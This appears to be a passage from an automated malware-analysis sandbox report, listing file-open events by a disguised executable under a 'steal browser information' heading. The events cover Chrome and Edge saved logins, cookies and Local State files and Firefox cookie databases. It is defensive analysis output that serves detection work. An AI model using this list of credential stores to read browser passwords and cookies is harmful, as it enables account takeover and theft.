Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
